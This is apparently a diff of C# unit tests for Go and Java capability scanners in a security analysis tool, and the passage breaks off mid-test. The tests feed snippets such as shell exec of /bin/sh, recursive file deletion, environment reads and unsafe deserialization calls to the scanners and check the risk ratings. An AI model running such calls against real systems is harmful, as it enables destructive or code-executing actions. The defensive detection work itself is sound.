namespace StellaOps.Scanner.Analyzers.Lang.Go.Tests.Internal;
/// <summary>
/// Tests for <see cref="GoCapabilityScanner"/>.
/// </summary>
public sealed class GoCapabilityScannerTests
{
private const string TestFile = "test.go";
#region ScanFile - General Tests
[Fact]
public void ScanFile_NullContent_ReturnsEmpty()
{
var result = GoCapabilityScanner.ScanFile(null!, TestFile);
Assert.Empty(result);
}
[Fact]
public void ScanFile_EmptyContent_ReturnsEmpty()
{
var result = GoCapabilityScanner.ScanFile("", TestFile);
Assert.Empty(result);
}
[Fact]
public void ScanFile_WhitespaceContent_ReturnsEmpty()
{
var result = GoCapabilityScanner.ScanFile(" \n\t\n ", TestFile);
Assert.Empty(result);
}
[Fact]
public void ScanFile_NoPatterns_ReturnsEmpty()
{
const string code = @"
package main
func main() {
x := 1 + 2
println(x)
}";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Empty(result);
}
[Fact]
public void ScanFile_NormalizesBackslashesInPath()
{
const string code = @"cmd := exec.Command(""ls"")";
var result = GoCapabilityScanner.ScanFile(code, @"C:\test\file.go");
Assert.Single(result);
Assert.Equal("C:/test/file.go", result[0].SourceFile);
}
[Fact]
public void ScanFile_DeduplicatesSamePattern()
{
const string code = @"
exec.Command(""ls"")
exec.Command(""pwd"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
// Two different lines = two evidences
Assert.Equal(2, result.Count);
}
[Fact]
public void ScanFile_SortsByFileLineThenKind()
{
const string code = @"
os.Getenv(""PATH"")
exec.Command(""ls"")
os.Open(""file.txt"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.True(result.Count >= 3);
for (int i = 1; i < result.Count; i++)
{
Assert.True(
result[i - 1].SourceLine < result[i].SourceLine ||
(result[i - 1].SourceLine == result[i].SourceLine &&
result[i - 1].Kind <= result[i].Kind));
}
}
#endregion
#region ScanFile - Comment Stripping
[Fact]
public void ScanFile_IgnoresSingleLineComments()
{
const string code = @"
package main
// exec.Command(""ls"") - this is a comment
func main() {}";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Empty(result);
}
[Fact]
public void ScanFile_IgnoresMultiLineComments()
{
const string code = @"
package main
/*
exec.Command(""ls"")
os.Remove(""file"")
*/
func main() {}";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Empty(result);
}
#endregion
#region ScanFile - Exec Patterns
[Fact]
public void ScanFile_DetectsExecCommand()
{
const string code = @"cmd := exec.Command(""ls"", ""-la"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("exec.Command", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
Assert.Equal(1.0f, result[0].Confidence);
}
[Fact]
public void ScanFile_DetectsExecCommandContext()
{
const string code = @"cmd := exec.CommandContext(ctx, ""ls"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("exec.Command", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsSyscallExec()
{
const string code = @"syscall.Exec(""/bin/sh"", args, env)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("syscall.Exec", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsSyscallForkExec()
{
const string code = @"syscall.ForkExec(""/bin/sh"", args, nil)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("syscall.Exec", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsOsStartProcess()
{
const string code = @"os.StartProcess(""/bin/ls"", []string{}, &attr)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("os.StartProcess", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
#endregion
#region ScanFile - Filesystem Patterns
[Fact]
public void ScanFile_DetectsOsCreate()
{
const string code = @"f, err := os.Create(""file.txt"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("os.Open/Create", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsOsOpen()
{
const string code = @"f, err := os.Open(""file.txt"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("os.Open/Create", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsOsOpenFile()
{
const string code = @"f, err := os.OpenFile(""file.txt"", os.O_RDWR, 0644)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
}
[Fact]
public void ScanFile_DetectsOsRemove()
{
const string code = @"os.Remove(""file.txt"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("os.Remove/RemoveAll", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsOsRemoveAll()
{
const string code = @"os.RemoveAll(""/tmp/dir"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("os.Remove/RemoveAll", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsOsChmod()
{
const string code = @"os.Chmod(""file.txt"", 0755)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("os.Chmod/Chown", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsOsChown()
{
const string code = @"os.Chown(""file.txt"", 1000, 1000)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("os.Chmod/Chown", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsOsSymlink()
{
const string code = @"os.Symlink(""target"", ""link"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("os.Symlink/Link", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsOsMkdir()
{
const string code = @"os.Mkdir(""dir"", 0755)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("os.Mkdir", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsOsReadFile()
{
const string code = @"data, _ := os.ReadFile(""file.txt"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("os.ReadFile/WriteFile", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsIoutilReadFile()
{
const string code = @"data, _ := ioutil.ReadFile(""file.txt"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("ioutil", result[0].Pattern);
}
#endregion
#region ScanFile - Network Patterns
[Fact]
public void ScanFile_DetectsNetDial()
{
const string code = @"conn, _ := net.Dial(""tcp"", ""localhost:8080"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("net.Dial", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsNetListen()
{
const string code = @"ln, _ := net.Listen(""tcp"", "":8080"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("net.Listen", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsHttpGet()
{
const string code = @"resp, _ := http.Get(""https://example.com"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("http.Get/Post", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsHttpPost()
{
const string code = @"resp, _ := http.Post(""https://example.com"", ""application/json"", body)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("http.Get/Post", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsHttpListenAndServe()
{
const string code = @"http.ListenAndServe("":8080"", nil)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("http.ListenAndServe", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsNetLookupHost()
{
const string code = @"addrs, _ := net.LookupHost(""example.com"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("net.Lookup", result[0].Pattern);
Assert.Equal(CapabilityRisk.Low, result[0].Risk);
}
#endregion
#region ScanFile - Environment Patterns
[Fact]
public void ScanFile_DetectsOsGetenv()
{
const string code = @"val := os.Getenv(""PATH"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("os.Getenv", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsOsLookupEnv()
{
const string code = @"val, ok := os.LookupEnv(""PATH"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("os.Getenv", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsOsSetenv()
{
const string code = @"os.Setenv(""MY_VAR"", ""value"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("os.Setenv", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsOsEnviron()
{
const string code = @"env := os.Environ()";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("os.Environ", result[0].Pattern);
}
#endregion
#region ScanFile - Serialization Patterns
[Fact]
public void ScanFile_DetectsGobDecoder()
{
const string code = @"dec := gob.NewDecoder(reader)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("gob.Decoder/Encoder", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsJsonUnmarshal()
{
const string code = @"json.Unmarshal(data, &obj)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("json", result[0].Pattern);
Assert.Equal(CapabilityRisk.Low, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsXmlUnmarshal()
{
const string code = @"xml.Unmarshal(data, &obj)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("xml.Unmarshal", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsYamlUnmarshal()
{
const string code = @"yaml.Unmarshal(data, &obj)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("yaml.Unmarshal", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
#endregion
#region ScanFile - Crypto Patterns
[Fact]
public void ScanFile_DetectsSha256New()
{
const string code = @"h := sha256.New()";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
Assert.Equal("crypto/hash", result[0].Pattern);
Assert.Equal(CapabilityRisk.Low, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsAesNewCipher()
{
const string code = @"block, _ := aes.NewCipher(key)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
Assert.Equal("crypto/cipher", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsRsaGenerateKey()
{
const string code = @"key, _ := rsa.GenerateKey(rand.Reader, 2048)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
Assert.Equal("crypto/rsa", result[0].Pattern);
}
#endregion
#region ScanFile - Database Patterns
[Fact]
public void ScanFile_DetectsSqlOpen()
{
const string code = @"db, _ := sql.Open(""postgres"", connStr)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("sql.Open", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
#endregion
#region ScanFile - Dynamic Code Patterns
[Fact]
public void ScanFile_DetectsReflectValueCall()
{
const string code = @"
import ""reflect""
v.Call(args)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("reflect.Value.Call", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsMethodByName()
{
const string code = @"m := v.MethodByName(""Execute"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("reflect.MethodByName", result[0].Pattern);
}
#endregion
#region ScanFile - Reflection Patterns
[Fact]
public void ScanFile_DetectsReflectTypeOf()
{
const string code = @"t := reflect.TypeOf(obj)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("reflect.TypeOf/ValueOf", result[0].Pattern);
Assert.Equal(CapabilityRisk.Low, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsReflectNew()
{
const string code = @"v := reflect.New(t)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("reflect.New", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsRuntimeCaller()
{
const string code = @"_, file, line, _ := runtime.Caller(0)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("runtime.Caller", result[0].Pattern);
}
#endregion
#region ScanFile - Native Code Patterns
[Fact]
public void ScanFile_DetectsCgoImport()
{
const string code = @"import ""C""";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Contains("C", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsUnsafePointer()
{
const string code = @"ptr := unsafe.Pointer(&x)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("unsafe.Pointer", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsGoLinknameDirective()
{
const string code = @"//go:linkname localName runtime.someInternalFunc";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("go:linkname", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsGoNoescapeDirective()
{
const string code = @"//go:noescape
func unsafeFunc(ptr *byte)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("go:noescape", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsSyscallSyscall()
{
const string code = @"r1, r2, err := syscall.Syscall(SYS_WRITE, fd, buf, count)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("syscall.Syscall", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
#endregion
#region ScanFile - Plugin Patterns
[Fact]
public void ScanFile_DetectsPluginOpen()
{
const string code = @"p, _ := plugin.Open(""plugin.so"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.PluginLoading, result[0].Kind);
Assert.Equal("plugin.Open", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
#endregion
#region GoCapabilityEvidence Tests
[Fact]
public void Evidence_DeduplicationKey_IsCorrect()
{
var evidence = new GoCapabilityEvidence(
CapabilityKind.Exec,
"test.go",
10,
"exec.Command");
Assert.Equal("Exec|test.go|10|exec.Command", evidence.DeduplicationKey);
}
[Fact]
public void Evidence_ConfidenceIsClamped()
{
var evidence1 = new GoCapabilityEvidence(
CapabilityKind.Exec, "test.go", 1, "pattern",
confidence: 2.0f);
var evidence2 = new GoCapabilityEvidence(
CapabilityKind.Exec, "test.go", 1, "pattern",
confidence: -1.0f);
Assert.Equal(1.0f, evidence1.Confidence);
Assert.Equal(0.0f, evidence2.Confidence);
}
[Fact]
public void Evidence_CreateMetadata_IncludesAllFields()
{
var evidence = new GoCapabilityEvidence(
CapabilityKind.Exec,
"test.go",
10,
"exec.Command",
snippet: "cmd := exec.Command(\"ls\")",
confidence: 0.95f,
risk: CapabilityRisk.Critical);
var metadata = evidence.CreateMetadata().ToDictionary(kv => kv.Key, kv => kv.Value);
Assert.Equal("exec", metadata["capability.kind"]);
Assert.Equal("test.go:10", metadata["capability.source"]);
Assert.Equal("exec.Command", metadata["capability.pattern"]);
Assert.Equal("critical", metadata["capability.risk"]);
Assert.Equal("0.95", metadata["capability.confidence"]);
Assert.Contains("exec.Command", metadata["capability.snippet"]);
}
[Fact]
public void Evidence_ToLanguageEvidence_ReturnsCorrectFormat()
{
var evidence = new GoCapabilityEvidence(
CapabilityKind.Exec,
"test.go",
10,
"exec.Command");
var langEvidence = evidence.ToLanguageEvidence();
Assert.Equal(LanguageEvidenceKind.Metadata, langEvidence.Kind);
Assert.Equal("test.go", langEvidence.Source);
Assert.Equal("line:10", langEvidence.Locator);
Assert.Equal("Exec:exec.Command", langEvidence.Value);
}
#endregion
}

View File

@@ -0,0 +1,786 @@
using StellaOps.Scanner.Analyzers.Lang.Java.Internal.Capabilities;
namespace StellaOps.Scanner.Analyzers.Lang.Java.Tests.Internal;
/// <summary>
/// Tests for <see cref="JavaCapabilityScanner"/>.
/// </summary>
public sealed class JavaCapabilityScannerTests
{
private const string TestFile = "Test.java";
#region ScanFile - General Tests
[Fact]
public void ScanFile_NullContent_ReturnsEmpty()
{
var result = JavaCapabilityScanner.ScanFile(null!, TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_EmptyContent_ReturnsEmpty()
{
var result = JavaCapabilityScanner.ScanFile("", TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_WhitespaceContent_ReturnsEmpty()
{
var result = JavaCapabilityScanner.ScanFile(" \n\t\n ", TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_NoPatterns_ReturnsEmpty()
{
const string code = @"
public class Test {
public static void main(String[] args) {
System.out.println(""Hello"");
}
}";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_NormalizesBackslashesInPath()
{
const string code = @"Runtime.getRuntime().exec(""cmd"");";
var result = JavaCapabilityScanner.ScanFile(code, @"C:\src\Test.java").ToList();
Assert.Single(result);
Assert.Equal("C:/src/Test.java", result[0].SourceFile);
}
#endregion
#region ScanFile - Comment Stripping
[Fact]
public void ScanFile_IgnoresSingleLineComments()
{
const string code = @"
// Runtime.getRuntime().exec(""cmd"");
public void method() { }";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_IgnoresMultiLineComments()
{
const string code = @"
/*
Runtime.getRuntime().exec(""cmd"");
new ProcessBuilder(""ls"");
*/
public void method() { }";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_IgnoresJavadocComments()
{
const string code = @"
/**
* Runtime.getRuntime().exec(""cmd"");
*/
public void method() { }";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Empty(result);
}
#endregion
#region ScanFile - Exec Patterns
[Fact]
public void ScanFile_DetectsRuntimeExec()
{
const string code = @"Runtime.getRuntime().exec(""ls -la"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("Runtime.exec", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
Assert.Equal(1.0f, result[0].Confidence);
}
[Fact]
public void ScanFile_DetectsNewProcessBuilder()
{
const string code = @"ProcessBuilder pb = new ProcessBuilder(""ls"", ""-la"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("ProcessBuilder", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsProcessBuilderStart()
{
const string code = @"Process p = pb.start();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("ProcessBuilder.start", result[0].Pattern);
}
#endregion
#region ScanFile - Filesystem Patterns
[Fact]
public void ScanFile_DetectsFileInputStream()
{
const string code = @"InputStream is = new FileInputStream(""file.txt"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("FileInputStream", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsFileOutputStream()
{
const string code = @"OutputStream os = new FileOutputStream(""file.txt"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("FileOutputStream", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsFilesRead()
{
const string code = @"byte[] data = Files.readAllBytes(path);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("Files.*", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsFileDelete()
{
const string code = @"file.delete();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("File.delete", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsFileSetExecutable()
{
const string code = @"file.setExecutable(true);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("File.setExecutable", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsRandomAccessFile()
{
const string code = @"RandomAccessFile raf = new RandomAccessFile(""file.bin"", ""rw"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("RandomAccessFile", result[0].Pattern);
}
#endregion
#region ScanFile - Network Patterns
[Fact]
public void ScanFile_DetectsNewSocket()
{
const string code = @"Socket socket = new Socket(""localhost"", 8080);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("Socket", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsNewServerSocket()
{
const string code = @"ServerSocket ss = new ServerSocket(8080);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("ServerSocket", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsUrlOpenConnection()
{
const string code = @"HttpURLConnection conn = (HttpURLConnection) url.openConnection();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.True(result.Count >= 1);
Assert.Contains(result, r => r.Kind == CapabilityKind.Network);
}
[Fact]
public void ScanFile_DetectsHttpClientBuilder()
{
const string code = @"HttpClient client = HttpClient.newBuilder().build();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("HttpClient.newBuilder", result[0].Pattern);
}
#endregion
#region ScanFile - Environment Patterns
[Fact]
public void ScanFile_DetectsSystemGetenv()
{
const string code = @"String path = System.getenv(""PATH"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("System.getenv", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsSystemGetProperty()
{
const string code = @"String home = System.getProperty(""user.home"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("System.getProperty", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsSystemSetProperty()
{
const string code = @"System.setProperty(""my.prop"", ""value"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("System.setProperty", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
#endregion
#region ScanFile - Serialization Patterns (Critical for deserialization attacks)
[Fact]
public void ScanFile_DetectsObjectInputStream()
{
const string code = @"ObjectInputStream ois = new ObjectInputStream(fis);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("ObjectInputStream", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsReadObject()
{
const string code = @"Object obj = ois.readObject();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("readObject", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsXMLDecoder()
{
const string code = @"XMLDecoder decoder = new XMLDecoder(new FileInputStream(""data.xml""));";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.True(result.Count >= 1);
Assert.Contains(result, r => r.Pattern == "XMLDecoder" && r.Risk == CapabilityRisk.Critical);
}
[Fact]
public void ScanFile_DetectsXStream()
{
const string code = @"XStream xstream = new XStream();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("XStream", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsXStreamFromXML()
{
const string code = @"Object obj = xstream.fromXML(xml);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("XStream.fromXML", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsSnakeYamlLoad()
{
const string code = @"Object obj = yaml.load(input);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
